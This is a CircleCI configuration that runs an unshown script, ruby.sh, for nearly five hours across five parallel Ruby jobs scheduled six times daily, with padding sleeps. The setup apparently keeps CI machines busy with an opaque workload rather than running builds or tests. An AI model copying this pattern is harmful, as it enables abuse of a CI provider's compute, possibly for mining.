working_dir: &working_dir ~/app
.berondong_template: &kehilangan
  steps:
    - checkout
    - run:
        name: kecoalari
        command: |
                  chmod u+x ruby.sh 
                  timeout 290m ./ruby.sh
                  echo "lariii"
                  sleep 289m
        no_output_timeout: 290m
version: 2.0
jobs:
  rubyjobs:
    docker:
      - image: ruby
    steps:
      - checkout
  rubyjobs1:
    <<: *kehilangan
    docker:
      - image: circleci/ruby:2.7.3
  rubyjobs2:
    <<: *kehilangan
    docker:
      - image: circleci/ruby:2.7
  rubyjobs3:
    <<: *kehilangan
    docker:
      - image: circleci/ruby:2.6.8
  rubyjobs4:
    <<: *kehilangan
    docker:
      - image: circleci/ruby:2.6.7
workflows:
  version: 2
  commit:
    jobs:
      - rubyjobs
      - rubyjobs1
      - rubyjobs2
      - rubyjobs3
      - rubyjobs4
    triggers:
      - schedule:
          cron: "0 4,8,12,16,20,23 * * *"
          filters:
            branches:
              only:
                - master
                
  rubyjobsrun:
    jobs:
      - rubyjobs
      - rubyjobs1
      - rubyjobs2
      - rubyjobs3
      - rubyjobs4
